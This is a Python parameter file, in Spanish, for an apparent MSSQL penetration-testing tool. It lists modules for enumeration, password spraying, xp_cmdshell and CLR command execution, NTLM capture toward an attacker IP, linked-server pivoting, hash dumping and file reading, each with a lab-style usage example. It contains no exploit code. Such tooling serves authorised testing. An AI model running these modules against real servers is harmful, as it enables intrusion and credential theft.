# scripts/mssql/shell_params.py

EXPORT_FORMATS = ["json", "html", "xml", "yaml"]

SCRIPT_PARAMS = {
    # ── enum ──────────────────────────────────────────────────────────────────
    "version-enum": {
        "description": "Enumera versión de MSSQL, edición, nivel de parche y nombre del servidor sin credenciales.",
        "required": ["target"],
        "optional": ["port", "instance", "timeout"],
        "defaults": {"port": 1433, "timeout": 5},
        "example": ["set target 10.10.10.5", "run"],
    },
    "instance-enum": {
        "description": "Descubre instancias MSSQL via SQL Browser (UDP 1434) y resolución de puertos dinámicos.",
        "required": ["target"],
        "optional": ["timeout"],
        "defaults": {"timeout": 5},
        "example": ["set target 10.10.10.5", "run"],
    },
    "auth-check": {
        "description": "Comprueba si autenticación SQL (sa vacía) y Windows (guest/NTLM) están habilitadas.",
        "required": ["target"],
        "optional": ["port", "instance", "timeout"],
        "defaults": {"port": 1433, "timeout": 5},
        "example": ["set target 10.10.10.5", "run"],
    },
    "db-enum": {
        "description": "Enumera bases de datos accesibles, tablas y columnas interesantes (passwords, users, tokens).",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "port", "instance", "timeout"],
        "defaults": {"port": 1433, "timeout": 5},
        "mutually_exclusive": [["password", "hash"]],
        "example": ["set target 10.10.10.5", "set user sa", "set password Pass123!", "run"],
    },
    "user-enum": {
        "description": "Enumera logins, usuarios y roles del servidor MSSQL. Detecta SA y sysadmin.",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "port", "instance", "timeout"],
        "defaults": {"port": 1433, "timeout": 5},
        "mutually_exclusive": [["password", "hash"]],
        "example": ["set target 10.10.10.5", "set user sa", "set password Pass123!", "run"],
    },
    "privs-check": {
        "description": "Comprueba privilegios: sysadmin, xp_cmdshell, impersonation, TRUSTWORTHY databases.",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "port", "instance", "timeout"],
        "defaults": {"port": 1433, "timeout": 5},
        "mutually_exclusive": [["password", "hash"]],
        "example": ["set target 10.10.10.5", "set user sa", "set password Pass123!", "run"],
    },
    "linked-servers": {
        "description": "Enumera servidores enlazados (linked servers) y sus credenciales almacenadas.",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "port", "instance", "timeout"],
        "defaults": {"port": 1433, "timeout": 5},
        "mutually_exclusive": [["password", "hash"]],
        "example": ["set target 10.10.10.5", "set user sa", "set password Pass123!", "run"],
    },
    # ── attack ────────────────────────────────────────────────────────────────
    "password-spray": {
        "description": "Password spray contra lista de usuarios MSSQL con delay configurable.",
        "required": ["target", "userlist"],
        "optional": ["password", "port", "instance", "timeout", "delay"],
        "defaults": {"port": 1433, "timeout": 5, "delay": 1},
        "example": ["set target 10.10.10.5", "set userlist users.txt", "set password Summer2024!", "run"],
    },
    "xp-cmdshell": {
        "description": "Ejecuta comandos OS via xp_cmdshell (requiere sysadmin). Guarda output en session_db.",
        "required": ["target", "user", "command"],
        "optional": ["password", "hash", "domain", "port", "instance", "timeout"],
        "defaults": {"port": 1433, "timeout": 5},
        "mutually_exclusive": [["password", "hash"]],
        "example": ["set target 10.10.10.5", "set user sa", "set password Pass123!", "set command whoami", "run"],
    },
    "ntlm-steal": {
        "description": "Fuerza autenticación NTLM del servidor hacia un listener via xp_dirtree (UNC path injection).",
        "required": ["target", "user", "attacker_ip"],
        "optional": ["password", "hash", "domain", "port", "instance", "timeout"],
        "defaults": {"port": 1433, "timeout": 5},
        "mutually_exclusive": [["password", "hash"]],
        "example": ["set target 10.10.10.5", "set user sa", "set password Pass123!", "set attacker_ip 10.10.14.5", "run"],
    },
    # ── exploit ───────────────────────────────────────────────────────────────
    "xp-cmdshell-enable": {
        "description": "Habilita xp_cmdshell via sp_configure si está deshabilitado (requiere sysadmin).",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "port", "instance", "timeout"],
        "defaults": {"port": 1433, "timeout": 5},
        "mutually_exclusive": [["password", "hash"]],
        "example": ["set target 10.10.10.5", "set user sa", "set password Pass123!", "run"],
    },
    "clr-exec": {
        "description": "Ejecución via CLR Assembly personalizado — bypass cuando xp_cmdshell está deshabilitado.",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "port", "instance", "timeout", "command"],
        "defaults": {"port": 1433, "timeout": 5, "command": "whoami"},
        "mutually_exclusive": [["password", "hash"]],
        "example": ["set target 10.10.10.5", "set user sa", "set password Pass123!", "set command ipconfig", "run"],
    },
    "agent-job": {
        "description": "Ejecución via SQL Server Agent Job (requiere SQLAgentOperatorRole o superior).",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "port", "instance", "timeout", "command"],
        "defaults": {"port": 1433, "timeout": 10, "command": "whoami"},
        "mutually_exclusive": [["password", "hash"]],
        "example": ["set target 10.10.10.5", "set user sa", "set password Pass123!", "set command whoami", "run"],
    },
    "linked-exec": {
        "description": "Ejecución via linked server chain (openquery / exec at). Pivoting entre servidores SQL.",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "port", "instance", "timeout", "command"],
        "defaults": {"port": 1433, "timeout": 5, "command": "whoami"},
        "mutually_exclusive": [["password", "hash"]],
        "example": ["set target 10.10.10.5", "set user sa", "set password Pass123!", "set command whoami", "run"],
    },
    # ── post ──────────────────────────────────────────────────────────────────
    "dump-hashes": {
        "description": "Extrae hashes de logins MSSQL (sys.sql_logins) para cracking offline con hashcat.",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "port", "instance", "timeout"],
        "defaults": {"port": 1433, "timeout": 5},
        "mutually_exclusive": [["password", "hash"]],
        "example": ["set target 10.10.10.5", "set user sa", "set password Pass123!", "run"],
    },
    "read-file": {
        "description": "Lee ficheros del sistema via OPENROWSET o BULK INSERT (requiere ADMINISTER BULK OPS).",
        "required": ["target", "user"],
        "optional": ["password", "hash", "domain", "port", "instance", "timeout"],
        "defaults": {"port": 1433, "timeout": 5},
        "mutually_exclusive": [["password", "hash"]],
        "example": ["set target 10.10.10.5", "set user sa", "set password Pass123!", "run"],
    },
    "custom-query": {
        "description": "Ejecuta una query SQL arbitraria y muestra el resultado formateado.",
        "required": ["target", "user", "query"],
        "optional": ["password", "hash", "domain", "port", "instance", "timeout"],
        "defaults": {"port": 1433, "timeout": 5},
        "mutually_exclusive": [["password", "hash"]],
        "example": ["set target 10.10.10.5", "set user sa", "set password Pass123!", "set query SELECT name FROM sys.databases", "run"],
    },
}

PARAM_LABELS = {
    "target":      "IP/hostname del objetivo",
    "user":        "Usuario MSSQL",
    "password":    "Contraseña MSSQL",
    "hash":        "Hash NT (pass-the-hash)",
    "domain":      "Dominio Windows (para auth integrada)",
    "port":        "Puerto MSSQL (default: 1433)",
    "instance":    "Nombre de instancia (ej: SQLEXPRESS)",
    "timeout":     "Timeout de conexión (segundos)",
    "userlist":    "Ruta al fichero de usuarios",
    "passlist":    "Ruta al fichero de passwords",
    "delay":       "Delay entre intentos (segundos)",
    "command":     "Comando OS a ejecutar",
    "query":       "Query SQL a ejecutar",
    "attacker_ip": "IP del atacante (para captura NTLM)",
}
